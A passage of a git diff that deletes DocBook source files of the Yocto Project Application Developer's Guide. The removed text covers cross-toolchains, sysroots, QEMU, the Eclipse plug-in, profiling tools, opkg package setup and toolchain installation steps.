- which allows you to cross-develop on the host machine for the target hardware.
- </para></listitem>
- <listitem><para>The Eclipse IDE Yocto Plug-in.</para></listitem>
- <listitem><para>The Quick EMUlator (QEMU), which lets you simulate target hardware.
- </para></listitem>
- <listitem><para>Various user-space tools that greatly enhance your application
- development experience.</para></listitem>
- </itemizedlist>
- </para>
-
- <section id='the-cross-development-toolchain'>
- <title>The Cross-Development Toolchain</title>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_DEV_URL;#cross-development-toolchain'>Cross-Development Toolchain</ulink>
- consists of a cross-compiler, cross-linker, and cross-debugger
- that are used to develop user-space applications for targeted
- hardware.
- This toolchain is created either by running the ADT Installer
- script, a toolchain installer script, or through a
- <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>
- that is based on your Metadata configuration or extension for
- your targeted device.
- The cross-toolchain works with a matching target sysroot.
- </para>
- </section>
-
- <section id='sysroot'>
- <title>Sysroot</title>
-
- <para>
- The matching target sysroot contains needed headers and libraries for generating
- binaries that run on the target architecture.
- The sysroot is based on the target root filesystem image that is built by
- the OpenEmbedded build system and uses the same Metadata configuration
- used to build the cross-toolchain.
- </para>
- </section>
-
- <section id='eclipse-overview'>
- <title>Eclipse Yocto Plug-in</title>
-
- <para>
- The Eclipse IDE is a popular development environment and it fully supports
- development using the Yocto Project.
- When you install and configure the Eclipse Yocto Project Plug-in into
- the Eclipse IDE, you maximize your Yocto Project experience.
- Installing and configuring the Plug-in results in an environment that
- has extensions specifically designed to let you more easily develop software.
- These extensions allow for cross-compilation, deployment, and execution of
- your output into a QEMU emulation session.
- You can also perform cross-debugging and profiling.
- The environment also supports a suite of tools that allows you to perform
- remote profiling, tracing, collection of power data, collection of
- latency data, and collection of performance data.
- </para>
-
- <para>
- For information about the application development workflow that uses the Eclipse
- IDE and for a detailed example of how to install and configure the Eclipse
- Yocto Project Plug-in, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#adt-eclipse'>Working Within Eclipse</ulink>" section
- of the Yocto Project Development Manual.
- </para>
- </section>
-
- <section id='the-qemu-emulator'>
- <title>The QEMU Emulator</title>
-
- <para>
- The QEMU emulator allows you to simulate your hardware while running your
- application or image.
- QEMU is made available a number of ways:
- <itemizedlist>
- <listitem><para>
- If you use the ADT Installer script to install ADT, you can
- specify whether or not to install QEMU.
- </para></listitem>
- <listitem><para>
- If you have cloned the <filename>poky</filename> Git
- repository to create a
- <ulink url='&YOCTO_DOCS_DEV_URL;#source-directory'>Source Directory</ulink>
- and you have sourced the environment setup script, QEMU is
- installed and automatically available.
- </para></listitem>
- <listitem><para>
- If you have downloaded a Yocto Project release and unpacked
- it to create a
- <ulink url='&YOCTO_DOCS_DEV_URL;#source-directory'>Source Directory</ulink>
- and you have sourced the environment setup script, QEMU is
- installed and automatically available.
- </para></listitem>
- <listitem><para>
- If you have installed the cross-toolchain tarball and you
- have sourced the toolchain's setup environment script, QEMU
- is also installed and automatically available.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='user-space-tools'>
- <title>User-Space Tools</title>
-
- <para>
- User-space tools are included as part of the Yocto Project.
- You will find these tools helpful during development.
- The tools include LatencyTOP, PowerTOP, OProfile, Perf, SystemTap, and Lttng-ust.
- These tools are common development tools for the Linux platform.
- <itemizedlist>
- <listitem><para><emphasis>LatencyTOP:</emphasis> LatencyTOP focuses on latency
- that causes skips in audio,
- stutters in your desktop experience, or situations that overload your server
- even when you have plenty of CPU power left.
- </para></listitem>
- <listitem><para><emphasis>PowerTOP:</emphasis> Helps you determine what
- software is using the most power.
- You can find out more about PowerTOP at
- <ulink url='https://01.org/powertop/'></ulink>.</para></listitem>
- <listitem><para><emphasis>OProfile:</emphasis> A system-wide profiler for Linux
- systems that is capable of profiling all running code at low overhead.
- You can find out more about OProfile at
- <ulink url='http://oprofile.sourceforge.net/about/'></ulink>.
- For examples on how to setup and use this tool, see the
- "<ulink url='&YOCTO_DOCS_PROF_URL;#profile-manual-oprofile'>OProfile</ulink>"
- section in the Yocto Project Profiling and Tracing Manual.
- </para></listitem>
- <listitem><para><emphasis>Perf:</emphasis> Performance counters for Linux used
- to keep track of certain types of hardware and software events.
- For more information on these types of counters see
- <ulink url='https://perf.wiki.kernel.org/'></ulink>.
- For examples on how to setup and use this tool, see the
- "<ulink url='&YOCTO_DOCS_PROF_URL;#profile-manual-perf'>perf</ulink>"
- section in the Yocto Project Profiling and Tracing Manual.
- </para></listitem>
- <listitem><para><emphasis>SystemTap:</emphasis> A free software infrastructure
- that simplifies information gathering about a running Linux system.
- This information helps you diagnose performance or functional problems.
- SystemTap is not available as a user-space tool through the Eclipse IDE Yocto Plug-in.
- See <ulink url='http://sourceware.org/systemtap'></ulink> for more information
- on SystemTap.
- For examples on how to setup and use this tool, see the
- "<ulink url='&YOCTO_DOCS_PROF_URL;#profile-manual-systemtap'>SystemTap</ulink>"
- section in the Yocto Project Profiling and Tracing Manual.</para></listitem>
- <listitem><para><emphasis>Lttng-ust:</emphasis> A User-space Tracer designed to
- provide detailed information on user-space activity.
- See <ulink url='http://lttng.org/ust'></ulink> for more information on Lttng-ust.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-manual-customization.xsl b/documentation/adt-manual/adt-manual-customization.xsl
deleted file mode 100644
index b86be519b9..0000000000
--- a/documentation/adt-manual/adt-manual-customization.xsl
+++ /dev/null
@@ -1,27 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
-
- <xsl:param name="html.stylesheet" select="'adt-style.css'" />
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="appendix.autolabel" select="A" />
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
- <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/adt-manual/adt-manual-eclipse-customization.xsl b/documentation/adt-manual/adt-manual-eclipse-customization.xsl
deleted file mode 100644
index 77ba5f5719..0000000000
--- a/documentation/adt-manual/adt-manual-eclipse-customization.xsl
+++ /dev/null
@@ -1,35 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns="http://www.w3.org/1999/xhtml"
- xmlns:fo="http://www.w3.org/1999/XSL/Format"
- version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/eclipse/eclipse3.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/eclipse/eclipse3.xsl" />
-
- <xsl:import
- href="http://docbook.sourceforge.net/release/xsl/1.76.1/eclipse/eclipse3.xsl" />
-
--->
-
- <xsl:param name="chunker.output.indent" select="'yes'"/>
- <xsl:param name="chunk.quietly" select="1"/>
- <xsl:param name="chunk.first.sections" select="1"/>
- <xsl:param name="chunk.section.depth" select="10"/>
- <xsl:param name="use.id.as.filename" select="1"/>
- <xsl:param name="ulink.target" select="'_self'" />
- <xsl:param name="base.dir" select="'html/adt-manual/'"/>
- <xsl:param name="html.stylesheet" select="'../book.css'"/>
- <xsl:param name="eclipse.manifest" select="0"/>
- <xsl:param name="create.plugin.xml" select="0"/>
- <xsl:param name="suppress.navigation" select="1"/>
- <xsl:param name="generate.index" select="0"/>
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="appendix.autolabel" select="1" />
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
-</xsl:stylesheet>
diff --git a/documentation/adt-manual/adt-manual-intro.xml b/documentation/adt-manual/adt-manual-intro.xml
deleted file mode 100644
index 034fdff609..0000000000
--- a/documentation/adt-manual/adt-manual-intro.xml
+++ /dev/null
@@ -1,33 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='adt-manual-intro'>
-<title>Introduction</title>
-
- <para>
- Welcome to the Yocto Project Application Developer's Guide.
- This manual provides information that lets you begin developing applications
- using the Yocto Project.
- </para>
-
- <para>
- The Yocto Project provides an application development environment based on
- an Application Development Toolkit (ADT) and the availability of stand-alone
- cross-development toolchains and other tools.
- This manual describes the ADT and how you can configure and install it,
- how to access and use the cross-development toolchains, how to
- customize the development packages installation,
- how to use command-line development for both Autotools-based and
- Makefile-based projects, and an introduction to the
- <trademark class='trade'>Eclipse</trademark> IDE Yocto Plug-in.
- <note>
- The ADT is distribution-neutral and does not require the Yocto
- Project reference distribution, which is called Poky.
- This manual, however, uses examples that use the Poky distribution.
- </note>
- </para>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-manual.xml b/documentation/adt-manual/adt-manual.xml
deleted file mode 100644
index 972f8bf086..0000000000
--- a/documentation/adt-manual/adt-manual.xml
+++ /dev/null
@@ -1,140 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='adt-manual' lang='en'
- xmlns:xi="http://www.w3.org/2003/XInclude"
- xmlns="http://docbook.org/ns/docbook"
- >
- <bookinfo>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref='figures/adt-title.png'
- format='SVG'
- align='left' scalefit='1' width='100%'/>
- </imageobject>
- </mediaobject>
-
- <title>
- Yocto Project Application Developer's Guide
- </title>
-
- <authorgroup>
- <author>
- <firstname>Jessica</firstname> <surname>Zhang</surname>
- <affiliation>
- <orgname>Intel Corporation</orgname>
- </affiliation>
- <email>jessica.zhang@intel.com</email>
- </author>
- </authorgroup>
-
- <revhistory>
- <revision>
- <revnumber>1.0</revnumber>
- <date>6 April 2011</date>
- <revremark>Released with the Yocto Project 1.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.0.1</revnumber>
- <date>23 May 2011</date>
- <revremark>Released with the Yocto Project 1.0.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.1</revnumber>
- <date>6 October 2011</date>
- <revremark>Released with the Yocto Project 1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.2</revnumber>
- <date>April 2012</date>
- <revremark>Released with the Yocto Project 1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.3</revnumber>
- <date>October 2012</date>
- <revremark>Released with the Yocto Project 1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.4</revnumber>
- <date>April 2013</date>
- <revremark>Released with the Yocto Project 1.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.5</revnumber>
- <date>October 2013</date>
- <revremark>Released with the Yocto Project 1.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.5.1</revnumber>
- <date>January 2014</date>
- <revremark>Released with the Yocto Project 1.5.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.6</revnumber>
- <date>April 2014</date>
- <revremark>Released with the Yocto Project 1.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.7</revnumber>
- <date>October 2014</date>
- <revremark>Released with the Yocto Project 1.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.8</revnumber>
- <date>April 2015</date>
- <revremark>Released with the Yocto Project 1.8 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.0</revnumber>
- <date>October 2015</date>
- <revremark>Released with the Yocto Project 2.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.1</revnumber>
- <date>Sometime in 2016</date>
- <revremark>Released with the future Yocto Project 2.1 Release.</revremark>
- </revision>
- </revhistory>
-
- <copyright>
- <year>&COPYRIGHT_YEAR;</year>
- <holder>Linux Foundation</holder>
- </copyright>
-
- <legalnotice>
- <para>
- Permission is granted to copy, distribute and/or modify this document under
- the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
- </para>
- <note>
- For the latest version of this manual associated with this
- Yocto Project release, see the
- <ulink url='&YOCTO_DOCS_ADT_URL;'>Yocto Project Application Developer's Guide</ulink>
- from the Yocto Project website.
- </note>
-
- </legalnotice>
-
- </bookinfo>
-
- <xi:include href="adt-manual-intro.xml"/>
-
- <xi:include href="adt-intro.xml"/>
-
- <xi:include href="adt-prepare.xml"/>
-
- <xi:include href="adt-package.xml"/>
-
- <xi:include href="adt-command.xml"/>
-
-<!-- <index id='index'>
- <title>Index</title>
- </index>
--->
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-package.xml b/documentation/adt-manual/adt-package.xml
deleted file mode 100644
index 68eee9b389..0000000000
--- a/documentation/adt-manual/adt-package.xml
+++ /dev/null
@@ -1,102 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='adt-package'>
-<title>Optionally Customizing the Development Packages Installation</title>
-
- <para>
- Because the Yocto Project is suited for embedded Linux development, it is
- likely that you will need to customize your development packages installation.
- For example, if you are developing a minimal image, then you might not need
- certain packages (e.g. graphics support packages).
- Thus, you would like to be able to remove those packages from your target sysroot.
- </para>
-
-<section id='package-management-systems'>
- <title>Package Management Systems</title>
-
- <para>
- The OpenEmbedded build system supports the generation of sysroot files using
- three different Package Management Systems (PMS):
- <itemizedlist>
- <listitem><para><emphasis>OPKG:</emphasis> A less well known PMS whose use
- originated in the OpenEmbedded and OpenWrt embedded Linux projects.
- This PMS works with files packaged in an <filename>.ipk</filename> format.
- See <ulink url='http://en.wikipedia.org/wiki/Opkg'></ulink> for more
- information about OPKG.</para></listitem>
- <listitem><para><emphasis>RPM:</emphasis> A more widely known PMS intended for GNU/Linux
- distributions.
- This PMS works with files packaged in an <filename>.rpm</filename> format.
- The build system currently installs through this PMS by default.
- See <ulink url='http://en.wikipedia.org/wiki/RPM_Package_Manager'></ulink>
- for more information about RPM.</para></listitem>
- <listitem><para><emphasis>Debian:</emphasis> The PMS for Debian-based systems
- is built on many PMS tools.
- The lower-level PMS tool <filename>dpkg</filename> forms the base of the Debian PMS.
- For information on dpkg see
- <ulink url='http://en.wikipedia.org/wiki/Dpkg'></ulink>.</para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='configuring-the-pms'>
- <title>Configuring the PMS</title>
-
- <para>
- Whichever PMS you are using, you need to be sure that the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
- variable in the <filename>conf/local.conf</filename>
- file is set to reflect that system.
- The first value you choose for the variable specifies the package file format for the root
- filesystem at sysroot.
- Additional values specify additional formats for convenience or testing.
- See the <filename>conf/local.conf</filename> configuration file for
- details.
- </para>
-
- <note>
- For build performance information related to the PMS, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-package'><filename>package.bbclass</filename></ulink>"
- section in the Yocto Project Reference Manual.
- </note>
-
- <para>
- As an example, consider a scenario where you are using OPKG and you want to add
- the <filename>libglade</filename> package to the target sysroot.
- </para>
-
- <para>
- First, you should generate the IPK file for the
- <filename>libglade</filename> package and add it
- into a working <filename>opkg</filename> repository.
- Use these commands:
- <literallayout class='monospaced'>
- $ bitbake libglade
- $ bitbake package-index
- </literallayout>
- </para>
-
- <para>
- Next, source the cross-toolchain environment setup script found in the
- <ulink url='&YOCTO_DOCS_DEV_URL;#source-directory'>Source Directory</ulink>.
- Follow that by setting up the installation destination to point to your
- sysroot as <replaceable>sysroot_dir</replaceable>.
- Finally, have an OPKG configuration file <replaceable>conf_file</replaceable>
- that corresponds to the <filename>opkg</filename> repository you have just created.
- The following command forms should now work:
- <literallayout class='monospaced'>
- $ opkg-cl –f <replaceable>conf_file</replaceable> -o <replaceable>sysroot_dir</replaceable> update
- $ opkg-cl –f <replaceable>cconf_file</replaceable> -o <replaceable>sysroot_dir</replaceable> \
- --force-overwrite install libglade
- $ opkg-cl –f <replaceable>cconf_file</replaceable> -o <replaceable>sysroot_dir</replaceable> \
- --force-overwrite install libglade-dbg
- $ opkg-cl –f <replaceable>conf_file&gt; -o </replaceable>sysroot_dir&gt; \
- --force-overwrite install libglade-dev
- </literallayout>
- </para>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-prepare.xml b/documentation/adt-manual/adt-prepare.xml
deleted file mode 100644
index 65df1d03e6..0000000000
--- a/documentation/adt-manual/adt-prepare.xml
+++ /dev/null
@@ -1,999 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='adt-prepare'>
-
-<title>Preparing for Application Development</title>
-
-<para>
- In order to develop applications, you need set up your host development system.
- Several ways exist that allow you to install cross-development tools, QEMU, the
- Eclipse Yocto Plug-in, and other tools.
- This chapter describes how to prepare for application development.
-</para>
-
-<section id='installing-the-adt'>
- <title>Installing the ADT and Toolchains</title>
-
- <para>
- The following list describes installation methods that set up varying
- degrees of tool availability on your system.
- Regardless of the installation method you choose,
- you must <filename>source</filename> the cross-toolchain
- environment setup script, which establishes several key
- environment variables, before you use a toolchain.
- See the
- "<link linkend='setting-up-the-cross-development-environment'>Setting Up the Cross-Development Environment</link>"
- section for more information.
- </para>
-
- <note>
- <para>
- Avoid mixing installation methods when installing toolchains for
- different architectures.
- For example, avoid using the ADT Installer to install some
- toolchains and then hand-installing cross-development toolchains
- by running the toolchain installer for different architectures.
- Mixing installation methods can result in situations where the
- ADT Installer becomes unreliable and might not install the
- toolchain.
- </para>
-
- <para>
- If you must mix installation methods, you might avoid problems by
- deleting <filename>/var/lib/opkg</filename>, thus purging the
- <filename>opkg</filename> package metadata.
- </para>
- </note>
-
- <para>
- <itemizedlist>
- <listitem><para><emphasis>Use the ADT installer script:</emphasis>
- This method is the recommended way to install the ADT because it
- automates much of the process for you.
- For example, you can configure the installation to install the QEMU emulator
- and the user-space NFS, specify which root filesystem profiles to download,
- and define the target sysroot location.</para></listitem>
- <listitem><para><emphasis>Use an existing toolchain:</emphasis>
- Using this method, you select and download an architecture-specific
- toolchain installer and then run the script to hand-install the toolchain.
- If you use this method, you just get the cross-toolchain and QEMU - you do not
- get any of the other mentioned benefits had you run the ADT Installer script.</para></listitem>
- <listitem><para><emphasis>Use the toolchain from within the Build Directory:</emphasis>
- If you already have a
- <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>,
- you can build the cross-toolchain within the directory.
- However, like the previous method mentioned, you only get the cross-toolchain and QEMU - you
- do not get any of the other benefits without taking separate steps.</para></listitem>
- </itemizedlist>
- </para>
-
- <section id='using-the-adt-installer'>
- <title>Using the ADT Installer</title>
-
- <para>
- To run the ADT Installer, you need to get the ADT Installer tarball, be sure
- you have the necessary host development packages that support the ADT Installer,
- and then run the ADT Installer Script.
- </para>
-
- <para>
- For a list of the host packages needed to support ADT installation and use, see the
- "ADT Installer Extras" lists in the
- "<ulink url='&YOCTO_DOCS_REF_URL;#required-packages-for-the-host-development-system'>Required Packages for the Host Development System</ulink>" section
- of the Yocto Project Reference Manual.
- </para>
-
- <section id='getting-the-adt-installer-tarball'>
- <title>Getting the ADT Installer Tarball</title>
-
- <para>
- The ADT Installer is contained in the ADT Installer tarball.
- You can get the tarball using either of these methods:
- <itemizedlist>
- <listitem><para><emphasis>Download the Tarball:</emphasis>
- You can download the tarball from
- <ulink url='&YOCTO_ADTINSTALLER_DL_URL;'></ulink> into
- any directory.</para></listitem>
- <listitem><para><emphasis>Build the Tarball:</emphasis>
- You can use
- <ulink url='&YOCTO_DOCS_DEV_URL;#bitbake-term'>BitBake</ulink>
- to generate the tarball inside an existing
- <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>.
- </para>
- <para>If you use BitBake to generate the ADT Installer
- tarball, you must <filename>source</filename> the
- environment setup script
- (<ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-memres-core-script'><filename>oe-init-build-env-memres</filename></ulink>)
- located in the Source Directory before running the
- <filename>bitbake</filename> command that creates the
- tarball.</para>
- <para>The following example commands establish
- the
- <ulink url='&YOCTO_DOCS_DEV_URL;#source-directory'>Source Directory</ulink>,
- check out the current release branch, set up the
- build environment while also creating the default
- Build Directory, and run the
- <filename>bitbake</filename> command that results in the
- tarball
- <filename>poky/build/tmp/deploy/sdk/adt_installer.tar.bz2</filename>:
- <note>
- Before using BitBake to build the ADT tarball, be
- sure to make sure your
- <filename>local.conf</filename> file is properly
- configured.
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#user-configuration'>User Configuration</ulink>"
- section in the Yocto Project Reference Manual for
- general configuration information.
- </note>
- <literallayout class='monospaced'>
- $ cd ~
- $ git clone git://git.yoctoproject.org/poky
- $ cd poky
- $ git checkout -b &DISTRO_NAME; origin/&DISTRO_NAME;
- $ source &OE_INIT_FILE;
- $ bitbake adt-installer
- </literallayout></para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='configuring-and-running-the-adt-installer-script'>
- <title>Configuring and Running the ADT Installer Script</title>
-
- <para>
- Before running the ADT Installer script, you need to unpack the tarball.
- You can unpack the tarball in any directory you wish.
- For example, this command copies the ADT Installer tarball from where
- it was built into the home directory and then unpacks the tarball into
- a top-level directory named <filename>adt-installer</filename>:
- <literallayout class='monospaced'>
- $ cd ~
- $ cp poky/build/tmp/deploy/sdk/adt_installer.tar.bz2 $HOME
- $ tar -xjf adt_installer.tar.bz2
- </literallayout>
- Unpacking it creates the directory <filename>adt-installer</filename>,
- which contains the ADT Installer script (<filename>adt_installer</filename>)
- and its configuration file (<filename>adt_installer.conf</filename>).
- </para>
-
- <para>
- Before you run the script, however, you should examine the ADT Installer configuration
- file and be sure you are going to get what you want.
- Your configurations determine which kernel and filesystem image are downloaded.
- </para>
-
- <para>
- The following list describes the configurations you can define for the ADT Installer.
- For configuration values and restrictions, see the comments in
- the <filename>adt-installer.conf</filename> file:
-
- <itemizedlist>
- <listitem><para><filename>YOCTOADT_REPO</filename>: This area
- includes the IPKG-based packages and the root filesystem upon which
- the installation is based.
- If you want to set up your own IPKG repository pointed to by
- <filename>YOCTOADT_REPO</filename>, you need to be sure that the
- directory structure follows the same layout as the reference directory
- set up at <ulink url='http://adtrepo.yoctoproject.org'></ulink>.
- Also, your repository needs to be accessible through HTTP.</para></listitem>
- <listitem><para><filename>YOCTOADT_TARGETS</filename>: The machine
- target architectures for which you want to set up cross-development
- environments.</para></listitem>
- <listitem><para><filename>YOCTOADT_QEMU</filename>: Indicates whether
- or not to install the emulator QEMU.</para></listitem>
- <listitem><para><filename>YOCTOADT_NFS_UTIL</filename>: Indicates whether
- or not to install user-mode NFS.
- If you plan to use the Eclipse IDE Yocto plug-in against QEMU,
- you should install NFS.
- <note>To boot QEMU images using our userspace NFS server, you need
- to be running <filename>portmap</filename> or <filename>rpcbind</filename>.
- If you are running <filename>rpcbind</filename>, you will also need to add the
- <filename>-i</filename> option when <filename>rpcbind</filename> starts up.
- Please make sure you understand the security implications of doing this.
- You might also have to modify your firewall settings to allow
- NFS booting to work.</note></para></listitem>
- <listitem><para><filename>YOCTOADT_ROOTFS_</filename><replaceable>arch</replaceable>: The root
- filesystem images you want to download from the
- <filename>YOCTOADT_IPKG_REPO</filename> repository.</para></listitem>
- <listitem><para><filename>YOCTOADT_TARGET_SYSROOT_IMAGE_</filename><replaceable>arch</replaceable>: The
- particular root filesystem used to extract and create the target sysroot.
- The value of this variable must have been specified with
- <filename>YOCTOADT_ROOTFS_</filename><replaceable>arch</replaceable>.
- For example, if you downloaded both <filename>minimal</filename> and
- <filename>sato-sdk</filename> images by setting
- <filename>YOCTOADT_ROOTFS_</filename><replaceable>arch</replaceable>
- to "minimal sato-sdk", then <filename>YOCTOADT_ROOTFS_</filename><replaceable>arch</replaceable>
- must be set to either "minimal" or "sato-sdk".
- </para></listitem>
- <listitem><para><filename>YOCTOADT_TARGET_SYSROOT_LOC_</filename><replaceable>arch</replaceable>: The
- location on the development host where the target sysroot is created.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- After you have configured the <filename>adt_installer.conf</filename> file,
- run the installer using the following command:
- <literallayout class='monospaced'>
- $ cd adt-installer
- $ ./adt_installer
- </literallayout>
- Once the installer begins to run, you are asked to enter the
- location for cross-toolchain installation.
- The default location is
- <filename>/opt/poky/</filename><replaceable>release</replaceable>.
- After either accepting the default location or selecting your
- own location, you are prompted to run the installation script
- interactively or in silent mode.
- If you want to closely monitor the installation,
- choose “I†for interactive mode rather than “S†for silent mode.
- Follow the prompts from the script to complete the installation.
- </para>
-
- <para>
- Once the installation completes, the ADT, which includes the
- cross-toolchain, is installed in the selected installation
- directory.
- You will notice environment setup files for the cross-toolchain
- in the installation directory, and image tarballs in the
- <filename>adt-installer</filename> directory according to your
- installer configurations, and the target sysroot located
- according to the
- <filename>YOCTOADT_TARGET_SYSROOT_LOC_</filename><replaceable>arch</replaceable>
- variable also in your configuration file.
- </para>
- </section>
- </section>
-
- <section id='using-an-existing-toolchain-tarball'>
- <title>Using a Cross-Toolchain Tarball</title>
-
- <para>
- If you want to simply install a cross-toolchain by hand, you can
- do so by running the toolchain installer.
- The installer includes the pre-built cross-toolchain, the
- <filename>runqemu</filename> script, and support files.
- If you use this method to install the cross-toolchain, you
- might still need to install the target sysroot by installing and
- extracting it separately.
- For information on how to install the sysroot, see the
- "<link linkend='extracting-the-root-filesystem'>Extracting the Root Filesystem</link>" section.
- </para>
-
- <para>
- Follow these steps:
- <orderedlist>
- <listitem><para><emphasis>Get your toolchain installer using one of the following methods:</emphasis>
- <itemizedlist>
- <listitem><para>Go to
- <ulink url='&YOCTO_TOOLCHAIN_DL_URL;'></ulink>
- and find the folder that matches your host
- development system (i.e. <filename>i686</filename>
- for 32-bit machines or <filename>x86_64</filename>
- for 64-bit machines).</para>
- <para>Go into that folder and download the toolchain
- installer whose name includes the appropriate target
- architecture.
- The toolchains provided by the Yocto Project
- are based off of the
- <filename>core-image-sato</filename> image and
- contain libraries appropriate for developing
- against that image.
- For example, if your host development system is a
- 64-bit x86 system and you are going to use
- your cross-toolchain for a 32-bit x86
- target, go into the <filename>x86_64</filename>
- folder and download the following installer:
- <literallayout class='monospaced'>
- poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
- </literallayout></para></listitem>
- <listitem><para>Build your own toolchain installer.
- For cases where you cannot use an installer
- from the download area, you can build your own as
- described in the
- "<link linkend='optionally-building-a-toolchain-installer'>Optionally Building a Toolchain Installer</link>"
- section.</para></listitem>
- </itemizedlist></para></listitem>
- <listitem><para><emphasis>Once you have the installer, run it to install the toolchain:</emphasis>
- <note>
- You must change the permissions on the toolchain
- installer script so that it is executable.
- </note></para>
- <para>The following command shows how to run the installer
- given a toolchain tarball for a 64-bit x86 development host
- system and a 32-bit x86 target architecture.
- The example assumes the toolchain installer is located
- in <filename>~/Downloads/</filename>.
- <literallayout class='monospaced'>
- $ ~/Downloads/poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
- </literallayout>
- The first thing the installer prompts you for is the
- directory into which you want to install the toolchain.
- The default directory used is
- <filename>/opt/poky/&DISTRO;</filename>.
- If you do not have write permissions for the directory
- into which you are installing the toolchain, the
- toolchain installer notifies you and exits.
- Be sure you have write permissions in the directory and
- run the installer again.</para>
- <para>When the script finishes, the cross-toolchain is
- installed.
- You will notice environment setup files for the
- cross-toolchain in the installation directory.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='using-the-toolchain-from-within-the-build-tree'>
- <title>Using BitBake and the Build Directory</title>
-
- <para>
- A final way of making the cross-toolchain available is to use BitBake
- to generate the toolchain within an existing
- <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>.
- This method does not install the toolchain into the default
- <filename>/opt</filename> directory.
- As with the previous method, if you need to install the target sysroot, you must
- do that separately as well.
- </para>
-
- <para>
- Follow these steps to generate the toolchain into the Build Directory:
- <orderedlist>
- <listitem><para><emphasis>Set up the Build Environment:</emphasis>
- Source the OpenEmbedded build environment setup
- script (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
- or
